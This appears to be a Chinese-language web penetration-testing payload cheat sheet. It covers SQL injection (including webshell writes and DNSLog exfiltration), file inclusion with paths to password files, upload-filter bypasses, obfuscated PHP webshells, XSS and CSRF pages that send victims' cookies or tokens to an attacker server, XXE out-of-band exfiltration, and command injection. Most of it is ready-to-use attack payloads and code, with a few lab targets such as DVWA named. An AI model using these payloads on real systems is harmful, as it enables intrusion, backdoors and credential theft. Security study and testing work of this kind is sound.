Payload 总结

SQL注入

通用

select user(),version(),database()
select group_concat(schema_name) from information_schema.schemata
select group_concat(table_name) from information_schema.tables where table_schema=database()
select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='表名'

判断

// 字符型
?id=1xxx 			# 源码为 id='1xxx'， 正常
?id=1' and '1'='1 	# 源码为 id='1' and '1'='1'， 有回显
?id=1' and '1'='2 	# 源码为 id='1' and '1'='2'， 无回显

// 数字型
?id=1xxx 		# 源码为 id=1xxx， 报错
?id=1 and 1=1 	# 源码为 id=1 and 1=1， 有回显
?id=1 and 1=2 	# 源码为 id=1 and 1=2， 无回显

// 列数
1' ORDER BY 3--+
1' GROUP BY 3--+
1' union select @,@,@--+

注入

// 搜索框
1' and 1=1 and '%'='
%' and 1=1--'
%' and 1=1 and '%'='

// 报错，DML常用
' or updatexml(CHAR(126),(注入点),0x7e),null) or '
?id=1' and updatexml(null,concat(CHAR(126),(注入点),0x7e),null) --+
' or extractvalue(null,concat(CHAR(126),(注入点),0x7e)) or '
?id=1' and extractvalue(null,concat(CHAR(126),(注入点),0x7e)) --+
?id=1' union select 1, count(*), concat((注入点),0x7e,floor(rand(14)*2)) as x from 表名 group by x --+

// 布尔盲注
and (select count(*) from information_schma.tables where table_schema=database())>5 --+
and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>5 --+
and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97 --+

// 时间盲注
and if((select count(*) from information_schema.schemata)>5,1,sleep(5)) --+
and if((select length(schema_name) from information_schema.schemata limit 0,1)>5,1,sleep(5)) --+
and if((select ascii(substr(schema_name,1,1)) from information_schema.schemata limit 0,1)>97,1,sleep(5)) --+

// 二次注入
流程：注册用户名 admin' # => 登录 admin' # => 修改密码导致 admin 密码被改

// 二次编码
1%2527 and 0 --+

// 宽字节
%df%27 or 1=1 --+

// Out of band
select @@version into outfile '\\\\192.168.0.100\\temp\\out.txt'
select @@version into dumpfile '\\\\192.168.0.100\\temp\\out.txt'

// DNSLog
?id=1' and (select load_file(concat('\\\\',(注入点),'.xxxxx.dnslog.cn/abc'))) --+
?id=1' and (select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'))) --+
?id=1' and (select load_file(concat(0x5c5c5c5c,version(),0x2e6861636b65722e736974655c5c612e747874))) --+

// 写shell
[...] union select 1,2,"<?php @eval($_POST['cmd']);?>" into outfile "C:/Program Files/ToolBoxs/PhpStudy/PHPTutorial/WWW/shell.php"
[...] UNION SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
[...] UNION SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo();?>'
[...] UNION SELECT 1,2,3,4,5,0x3c3f70687020706870696e666f28293b203f3e into outfile 'C:\\wamp\\www\\pwnd.php'
[...] union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'
[...] UNION SELECT 0xPHP_PAYLOAD_IN_HEX, NULL, NULL INTO DUMPFILE 'C:/Program Files/EasyPHP-12.1/www/shell.php'
[...] UNION SELECT 0x3c3f7068702073797374656d28245f4745545b2763275d293b203f3e INTO DUMPFILE '/var/www/html/images/shell.php';

绕过

?id=-1 UNiOn SelEcT 1,2,3;%00
/*!11111select version()*/
select * from users where id=8E0union select 1,2,3
?id=1%27and(sleep(ascii(mid(database()from(1)for(1)))=109))%23
Select substr(database() from 1 for 1)
Select mid(database() from 1 for 1)
select * from news limit 1 offset 0
select user() like 'r%'
or 'swords'='sw'+'ords';EXEC('IN'+'SERT INTO'+'')
select%0a*%0afrom%0ausers;
select * from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64
select strcmp(left(database(),1),0x32)
?id=?id=11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111 or 1 --+
?id=-1 union selselectect 1,2,3 --+
?id=1&id=-1'
?id=-1 union %2573%65%6c%65%63%74 1,2,database()
?id=1") union/*!88888xxxxx*/%23%0aselect 1,2,3 --+
?id=1") order/*!88888xxxxx*/by 3 --+
?id=") group by 3 --+
?id=--1' union select 1,2,group_concat(key.key) from /*sql-yunsuo*/.key  --+
?id=/*-1' union select 1,2,3 --+
?id=/*' union select 1,2,(select/**/`key` from `key`)--+`
?id=1'/*xxxxxxxx*/order/*xxxxxxxx*/by 3 --+
?id=10000'/*xxxxxxxx*/%23%0aunion%23%0a/*xxxxxxxx*/select 1,database/*xxxxxxxx*/(),group_concat(/*xxxxxxxx*/user.key/*xxxxxxxx*/from database.user) --+

等价替换

0x7573657273 => "users"
%6f%72%20%31%3d%31 => or 1=1
char(0x67)+char(0x75)+char(0x65)+char(0x73)+char(0x74) => "guest"
hex() bin() => ascii()
sleep(3) => benchmark(200000000,encode('a','b'))
concat_ws() => group_concat()
json_arrayagg() => group_concat() (MySQL >= 5.7.22)
mid() substr() => substring()
@@user => user()
@@datadir => datadir()
like => =
group by 1 => order by 1
+ => 空格
0x3a => :
0x3c62723e => <br>
%23%0a = 注释换行
and => &&
or => ||
xor => |
not => !
() => 空格
+ => 空格
%0a => 空格
%a0 => 空格
tab => 空格
空格空格 => 空格
/* */ => 空格
/*!88888xxxxxx*/ => 空格
// -- /* */ # --+ --- ;%00 --a /*!表示不注释*/ /*!88888当数字大于mysql版本时算注释*/

文件包含

常见的敏感信息路径

Windows

// 查看系统版本
c:\boot.ini

// IIS配置文件
c:\windows\system32\inetsrv\MetaBase.xml

// 存储Windows系统初次安装的密码
c:\windows\repair\sam

// MySQL配置
c:\ProgramFiles\mysql\my.ini

// MySQL root密码
c:\ProgramFiles\mysql\data\mysql\user.MYD

// php 配置信息
c:\windows\php.ini

Linux/Unix

// 账户信息
/etc/passwd

// 账户密码文件
/etc/shadow

// Apache2默认配置文件
/usr/local/app/apache2/conf/httpd.conf

// 虚拟网站配置
/usr/local/app/apache2/conf/extra/httpd-vhost.conf

// PHP相关配置
/usr/local/app/php5/lib/php.ini

// Apache配置文件
/etc/httpd/conf/httpd.conf

// mysql 配置文件
/etc/my.conf

其他

可以通过 phpinfo() 中的 session.save_path 查看 session 的存储位置，默认为 /var/lib/php/session

payload

php?filename=../../../../../../../boot.ini%00

// Windows下目录最大长度为256字节，超出的部分会被丢弃；
// Linux下目录最大长度为4096字节，超出的部分会被丢弃。
php?filename=test.txt/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
php?filename=test.txt.................................................................................................................................................................................................................................................................................................................................................

// 伪协议
php?filename=http://192.168.91.133/FI/php.txt
php?filename=http://192.168.91.133/FI/php.txt%3f (?)
php?filename=http://192.168.91.133/FI/php.txt%23 (#)
php?filename=http://192.168.91.133/FI/php.txt%20 ( )

php?filename=php://filter/convert.base64-encode/resource=xxx.php
php?filename=php://filter/read=convert.base64-encode/resource=xxx.php

php?filename=php://input	post => <?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>');?>

php?filename=file://c:/boot.ini

php?filename=data://text/plain;base64;PD9waHAgcGhwaW5mbygpOw==

// 将shell.php用zip协议打成压缩包，并将压缩包命名为shell.png
php?filename=phar://shell.png/shell.php		post => cmd=phpinfo();
php?filename=zip://shell.png%23shell.php    post => cmd=phpinfo();

文件上传

php写shell

// FILE_APPEND 如果文件 filename 已经存在，追加数据而不是覆盖。LOCK_EX 在写入时获得一个独占锁。
file_put_contents("xxx.php", '<?php @eval($_POST["cmd"]?>', FILE_APPEND | LOCK_EX);
fwrite(fopen("xxx.php","a+"), '<?php @eval($_POST["cmd"]?>');
fputs(fopen("xxx.php","a+"), '<?php @eval($_POST["cmd"]?>');

绕马

<?php asset($_POST["cmd"]);?>
<?php $_POST["a"]($_POST["b"]);?>	post => a=assert&b=phpinfo()
<?php $a = substr_replace("assxxx","ert",3);$a($_POST["cmd"]);?>
<?php function test($a){$a($_POST["cmd"]);} test("assert");?>
<?php function test($func,$param){return $func($param);} test("assert",$_POST["cmd"]);?>
<?php call_user_func($_POST["a"],$_POST["b"]);?>	post => a=assert&b=phpinfo()
<?php forward_static_call_array("assert",array($_POST["cmd"]));?>
<?php $a=base64_decode($_POST["cmd"]);assert($a);?>
<?php $a = base64_decode("YXNzZXJ0");$a($_POST["cmd"]);?>
<?php $a = ("!"^"@")."ssert";$a($_POST["cmd"]);?>
<?php $_ = ("$"^"{}").("~"^".").("/"^"`").("-"^"~").("("^"|");${$_}["a"](${$_}["b"]);?>
<?php $a = chr(97).chr(115).chr(115).chr(101).chr(114).chr(116);$a(${chr(95).chr(80).chr(79).chr(83).chr(84)}[chr(34).chr(99).chr(109).chr(100).chr(34)]);?>
<?php class Test{var $a;var $b;function __construct($a, $b) {$this->a = $a;$this->b = $b;}function demo() {array_map($this->a,$this->b);}} $t = new Test("assert",array($_POST["cmd"]));$t->demo();?>

// 在线转换地址：https://www.toolfk.com/tools/convert-php.html

// 原始
<?php @eval($_POST['cmd']);?>

// 加密
<?php $O00OO0 = urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");
$O00O0O = $O00OO0{
    3} . $O00OO0{
    6} . $O00OO0{
    33} . $O00OO0{
    30};
$O0OO00 = $O00OO0{
    33} . $O00OO0{
    10} . $O00OO0{
    24} . $O00OO0{
    10} . $O00OO0{
    24};
$OO0O00 = $O0OO00{
    0} . $O00OO0{
    18} . $O00OO0{
    3} . $O0OO00{
    0}
    . $O0OO00{
        1} . $O00OO0{
        24};
$OO0000 = $O00OO0{
    7} . $O00OO0{
    13};
$O00O0O .= $O00OO0{
    22} . $O00OO0{
    36}
    . $O00OO0{
        29} . $O00OO0{
        26} . $O00OO0{
        30} . $O00OO0{
        32} . $O00OO0{
        35} . $O00OO0{
        26} . $O00OO0{
        30};
eval($O00O0O("JE8wTzAwMD0iSlhLaUNzSFRCenRFZ2t1UFJuVWxxV29lYnlORFZ4ckZPdmpMcEFhU21jd2ZkUWhHWllJTVFsbXlIRnZTR3hrVXBoc1p0UEJxb0t1TkVpblJ6SmZBY3dDVGpYTURkZ0xyWVdWYmFlSU9aUjlMTXZYcFdiejJlS0x1UUE5V1MxbkJLaVlDRUtXUGxEaDdaeDQ9IjsgIAogICAgICAgIGV2YWwoJz8+Jy4kTzAwTzBPKCRPME9PMDAoJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAqMiksJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAsJE9PMDAwMCksICAgIAogICAgICAgICRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));
?>

// 混淆
<?php function EDnRK($kYsyl)
{
    $kYsyl = gzinflate(base64_decode($kYsyl));
    for ($i = 0; $i < strlen($kYsyl); $i++) {
        $kYsyl[$i] = chr(ord($kYsyl[$i]) - 1);
    }
    return $kYsyl;
}
eval(EDnRK("U1QEAce08qRcTdWEwICQ0BiNlLxUjTgtGwd7AA=="));
?>

改包绕过

Content-Type: image/jpeg
// 先上传 .htaccess 文件，允许解析当前目录的 .jpg 文件，.htaccess 文件写入如下内容
SetHandler application/x-httpd-php
Content-Disposition: filename="shell.phtml"
Content-Disposition: filename="shell.php.xxx"
Content-Disposition: filename="shell.pHP"
Content-Disposition: filename="shell.php "
Content-Disposition: filename="shell.php."
Content-Disposition: filename="shell.php::$DATA"
Content-Disposition: filename="shell.php::$DA::$DATATA"
Content-Disposition: filename="shell.php. ."
Content-Disposition: filename="shell.pphphp"
Content-Disposition: filename="shell.php/."

// 修改一句话木马文件，在头部加上 GIF89a，将文件重命名为 .gif 后缀，再利用文件包含
?file=upload/4420220324224731.gif

// 00截断(GET)
POST /upload-labs/Pass-12/index.php?save_path=../upload/shell.php%00
Content-Disposition: filename="shell.jpg"
Content-Type: image/jpeg

// 00截断(POST)
Content-Disposition: filename="shell.jpg"
Content-Type: image/jpeg
在Hex中修改路径：../upload/ => ../upload/shell.php0 => ../upload/shell.php

// 二次渲染绕过，上传一个正常图片，然后下载下来与原来的图片做对比，用工具找到没有发生改变的地方，写入一句话，保存后再次上传
// 条件竞争绕过，先开启 python 请求脚本，再用 BurpSuite 爆破模块的 Null payloads 模式使用多线程一直发包上传一句话木马
// 7z后缀并不被Apache服务器所识别，却在上传文件名后缀的白名单中，可以利用Apache的解析漏洞将上传的7z后缀文件当做php文件解析

XSS

反射型

漏洞服务器

vul-page-reflected.php

<?php
header('content-type:text/html;charset=utf-8');
session_start();
if (isset($_GET['action'])) {
    $action = $_GET['action'];
    // ?action=<script>alert(1)</script>
    echo $action;
    if ($action == 'logout') {
        unset($_SESSION['name']);
        echo '成功退出';
        header("refresh:1;url='./vul-page-reflected.php'");
    } else {
        header("refresh:1;url='./vul-page-reflected.php'");
    }
} else {
    if (isset($_SESSION['name'])) {
        $name = $_SESSION['name'];
        echo "<a href='./vul-page-reflected.php?action=logout'>退出</a><br>";
        echo "欢迎 $name , 尊敬的vip 请留言!";
        echo "<h3>请留言：</h3>";
        echo "<form action='' method='post'>";
        echo "<textarea cols=30 rows=5 name='message'></textarea><br>";
        echo "<input type='submit' value='提交'></form>";
        if (isset($_POST['message'])) {
            echo " $name 说: {$_POST['message']}";
        }
    } else if (isset($_POST['name']) && isset($_POST['passwd'])) {
        $name = $_POST['name'];
        $passwd = $_POST['passwd'];
        if ($name == 'admin' && $passwd == '123456') {
            $_SESSION['name'] = $name;
            header('refresh:1;url="./vul-page-reflected.php"');
        } else {
            echo '账户或密码错误!';
            header('refresh:1;url="./vul-page-reflected.php"');
        }
    } else {
        echo "<h1>登录</h1>";
        echo "<form action='' method='post'>";
        echo "账户：<input type='text' name='name'><br>";
        echo "密码：<input type='password' name='passwd'><br>";
        echo "<input type='submit' value='ok'></form>";
    }
}

模拟演示-GET型

攻击者服务器

/xss/cookie-get.php

<?php
$cookie = $_GET['cookie'];
file_put_contents('cookie.txt',$cookie);

/xss/hook-get.js

xmlhttp = new XMLHttpRequest();
xmlhttp.open(
    "get",
    "http://[攻击者服务器IP]/xss/cookie-get.php?cookie=" + document.cookie,
    true // 开启异步
);
xmlhttp.send();

钓鱼页面

xss-get.html

<!DOCTYPE html>
<html lang="en">
	<head>
		<meta charset="UTF-8" />
		<title>XSS-GET</title>
	</head>

	<body>
		<!-- 直接跳转到攻击者服务器 -->
		<a
			href="http://[漏洞服务器IP]/vul-page-reflected.php/?name=<script>document.location='http://[攻击者服务器IP]/xss/cookie-get.php?cookie='%2Bdocument.cookie</script>"
			>点我有惊喜</a
		>
		<!-- 用 ajax 异步访问攻击者服务器 -->
		<a
			href="http://[漏洞服务器IP]/vul-page-reflected.php/?name=<script src='http://[攻击者服务器IP]/xss/hook-get.js'></script>"
			>点我也有惊喜</a
		>
	</body>
</html>

模拟演示-POST型

攻击者服务器

/xss/cookie-post.php

<?php
$cookie = $_POST['cookie'];
file_put_contents('cookie.txt',$cookie);

/xss/hook-post.js

xmlhttp = new XMLHttpRequest();
xmlhttp.open(
	"post",
	"http://[攻击者服务器IP]/xss/cookie-post.php",
	true // 开启异步
);
xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xmlhttp.send("cookie=" + document.cookie);

钓鱼页面

xss-post.html

<!DOCTYPE html>
<html lang="en">
	<head>
		<meta charset="UTF-8" />
		<title>XSS-POST</title>
	</head>

	<body>
		<form action="http://[漏洞服务器IP]/vul-page-reflected.php" method="post">
			<input
				type="hidden"
				name="message"
				value="<script src='[攻击者服务器IP]/xss/hook-post.js'></script>"
			/>
			<input type="submit" value="点我有惊喜" />
		</form>
	</body>
</html>

存储型

漏洞服务器

vul-page-stored.php

<?php
if (isset($_POST['message'])) {
	$message = $_POST['message'];
	file_put_contents('message.txt', $message);
}
?>
<html>

<head>
	<meta charset="utf-8">
	<title>Stored XSS</title>
</head>

<body>
	<form action="" method="post">
		留下你的评论：<textarea cols="30" rows="5" name="message" /></textarea>
		<input type="submit" value="提交">
	</form>
	<p>游客说：
		<?php
		if (file_exists('message.txt')) {
			echo file_get_contents('message.txt');
		} else {
			echo "暂无评论！";
		}
		?>
	</p>
</body>

</html>

DOM型

漏洞服务器

vul-page-dom.php

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <title>DOM XSS</title>
</head>

<body>
    <div>name:
        <script>
            if (document.location.href.indexOf("name=") >= 0) {
                var name = document.location.href.substring(document.location.href.indexOf("name=") + 5);
                document.write(decodeURI(name));
            } else {
                document.write('张三');
            }
        </script>
    </div>
    <form>
        输入大名：<input name="name">
        <input type="submit" value="ok">
    </form>
</body>

</html>

payload

// 常规操作
<script>alert(1)</script>
<script src="http://[ip]/[my.js]"></script>

// src属性绕过
<img src=x onerror=alert(1)>
<img/src=x onerror=alert(1)>
<video src=x onerror=alert(1)>
<audio src=x onerror=alert(1)>

// iframe 绕过 
<iframe src="javascript:alert(1)">
<iframe onload="alert(1)">

// a标签绕过
<a href="javascript:onclick=alert(1)">test</a>
<a href="javascript:alert(1)">test</a>

// script绕过
<scRiPt>alert(1)</scrIPt>
<scr<script>ipt>alert(1)</scr<script>ipt>

// 事件绕过
<svg onload=alert(1)>
<body onload=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<video><source onerror="javascript:alert(1)">

// 圆括号绕过
<a onmouseover="javascript:window.onerror=alert;throw 1"></a>
<img src=x onerror="javascript:window.onerror=alert;throw 1">
<script>alert`1`</script>
<img src=1 onerror=location="javascript:"+"aler"+"t%281%29">

// 在不需要任何用户交互的情况下执行脚本
<style onreadystatechange=alert(1)></style>
<iframe onreadystatechange=alert(1)></iframe>
<object onerror=alert(1)></object>
<img type=image src=valid.gif onreadystatechange=alert(1)>
<input type=image src=valid.gif onreadystatechange=alert(1)>
<body onbeforeactivate=alert(1)></body>
<video src=1 onerror=alert(1)></video>
<audio src=1 onerror=alert(1)>

// 伪协议
<object data=javascript:alert(1)></object>
<iframe src=javascript:alert(1)></iframe>
<event-source src=javascript:alert(1)></event-source>

// < 被转义 (点击事件绕过)
' onclick='alert(1)
" onclick="alert(1)

// script 被过滤，alert 被过滤 (换标签绕过)
<a onclick="alert(1)">test</a>

// < 被转义，script 被转义 (大小写绕过)
" ONclick="alert(1)
"><ScRiPt>alert(document.cookie)</ScRiPt>

// 编码绕过
"%3e%3cscript%3ealert(document.cookie)%3c/script%3e

// script 被过滤，< > 被转义 (双写绕过：绕过on)
" oonnclick="alert(1)
"><scr<script>ipt>alert(document.cookie)</scr</script>ipt>
<img o[%00]nerror=alert(1) src=a>

// script 被转义，< > 被转义 (伪协议绕过)
"><a href="javascript:alert(1)">test</a>"

// javascript 中的 i 被过滤 (HTML实体字符绕过)
javascr&#x69;pt:alert(1)
&#x3C;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x3C;&#x2F;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E;

// script、/、空格 被替换为 &nbsp; (换行绕过：%00 %09 %0d %0a)
<img%0Dsrc=x%0Donerror="alert(1)"/>
<img src=x onerror="javascript:window.onerror=alert;throw 1">

// <input type="text" name="name" value="test-text" >
"><script>alert(1)</script>

// <script>var a='test-text'; var b=123;...</script>
'; alert(1); var foo='

// <a href="test-text">Click here</a>html
javascript:alert(1);

CSRF

钓鱼页面

<html>
	<!-- CSRF PoC - generated by Burp Suite Professional -->
	<body>
		<form
			action="http://[漏洞服务器IP]/csrf-bank/change.php"
			method="post"
			id="csrf"
		>
			<input type="hidden" name="number" value="200" /><br />
			<input type="hidden" name="name" value="hacker" /><br />
			<input type="submit" value="Submit request" />
		</form>
	</body>
	<script>
        // 自动提交表单
		document.getElementById("csrf").submit();
	</script>
</html>

referer绕过

钓鱼页面

<!DOCTYPE html>
<html lang="en">
	<head>
		<meta charset="UTF-8" />
		<title>CSRF利用</title>
	</head>
	<body>
		<a
			id="demo"
			href="http://[漏洞服务器IP]/dvwa/vulnerabilities/xss_r/?name=<scriPt src=http://[攻击者服务器IP]/csrf/hook.js></scriPt>"
		>
			点我有惊喜！
		</a>
	</body>
</html>

/csrf/hook.js

xmlhttp = new XMLHttpRequest();
xmlhttp.open(
	"get",
	"http://[漏洞服务器IP]/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change"
);
xmlhttp.send();

token绕过

钓鱼页面

<!DOCTYPE html>
<html lang="en">
	<head>
		<meta charset="utf-8" />
		<title>token类型CSRF</title>
	</head>
	<body>
		<h1>token类型CSRF利用</h1>
		<a
			href="http://[漏洞服务器IP]/dvwa/vulnerabilities/xss_d/?default=Spanish#<script src=http://[攻击者服务器IP]/csrf/hook.js></script>"
		>
			点我有惊喜！
		</a>
	</body>
</html>

/csrf/hook.js

var url = "http://[漏洞服务器IP]/dvwa/vulnerabilities/csrf/";
if (window.XMLHttpRequest) {
	xmlhttp = new XMLHttpRequest();
} else {
	// 老版本的 Internet Explorer （IE5 和 IE6）使用 ActiveX 对象
	xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
}
var count = 0;
xmlhttp.withCredentials = true;
xmlhttp.onreadystatechange = function () {
	if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
		var content = xmlhttp.responseText;
		var pattern = "user_token' value='(.*?)'";
		var match = content.match(pattern);
		var token = match[1];
		var new_url =
			"http://[漏洞服务器IP]/dvwa/vulnerabilities/csrf/?user_token=" +
			token +
			"&password_new=password&password_conf=password&Change=Change";
		if (count == 0) {
			count++;
			xmlhttp.open("GET", new_url, false);
			xmlhttp.send();
		}
	}
};
xmlhttp.open("GET", url, false);
xmlhttp.send();

SSRF

XXE

有回显

payload

<?xml version="1.0"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>

无回显

攻击者服务器

attack.dtd

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=[目标文件及路径]">
<!ENTITY % payload "<!ENTITY &#x25; getcontent SYSTEM 'http://[攻击者服务器IP]/xxe/getcontent.php?content=%file;'>">
%file;
%payload;
%getcontent;

getcontent.php

<?php
$content = $_GET['content'];
$content = base64_decode($content);
file_put_contents("xxe_results.txt", $content);

payload

<?xml version="1.0"?>
<!DOCTYPE root[
    <!ENTITY % xxe SYSTEM "http://[攻击者服务器IP]/xxe/attack.dtd">
    %xxe;
]>

CRE

代码执行

file_put_contents("xxx.php", '<?php @eval($_POST["cmd"]?>', FILE_APPEND | LOCK_EX);
fwrite(fopen("xxx.php","a+"), '<?php @eval($_POST["cmd"]?>');
fputs(fopen("xxx.php","a+"), '<?php @eval($_POST["cmd"]?>');

命令执行

|ls
|cat${IFS}key.ph*
|cat${IFS}key.ph?
|echo "<?php @eval(\$_POST['cmd']);?>" > shell.php
|cat shell.php

反序列化

访问控制符：public/protected/private

<?php
header("content-type:text/html;charset=utf-8;");
class People
{
	public $name = "张三";
	protected $age = 18;
	private $money = 100.5;
	public function __construct($name, $age, $money)
	{
		$this->name = $name;
		$this->age = $age;
		$this->money = $money;
	}
	public function hello()
	{
		echo "My name is $this->name ,my age is $this->age ! ";
		echo "I have $this->money RMB!";
	}
}

$obj = new People("李四", 20, 175.5);
echo serialize($obj);

// O:6:"People":3:{s:4:"name";s:6:"李四";s:6:"*age";i:20;s:13:"Peoplemoney";d:175.5;}

$str = 'O:6:"People":3:{s:4:"name";s:6:"王五";S:6:"\00*\00age";i:22;S:13:"\00People\00money";d:180.5;}';
$obj = unserialize($str);
$obj->hello();

// My name is 王五 ,my age is 22 !
// I have 180.5 RMB!

注意：

属性数量大于真实数量时，会绕过 __wakeup 方法
protected 属性写成 S:6:"\00*\00age";，其中 \00 表示空格
private 属性写成 S:13:"\00People\00money";，其中 People 时类名

数组：

a:1:{i:0;O:6:"readme":1:{s:6:"source";s:8:"flag.php";}}

Previous业务逻辑漏洞 Next渗透测试流程

Last updated 3 years ago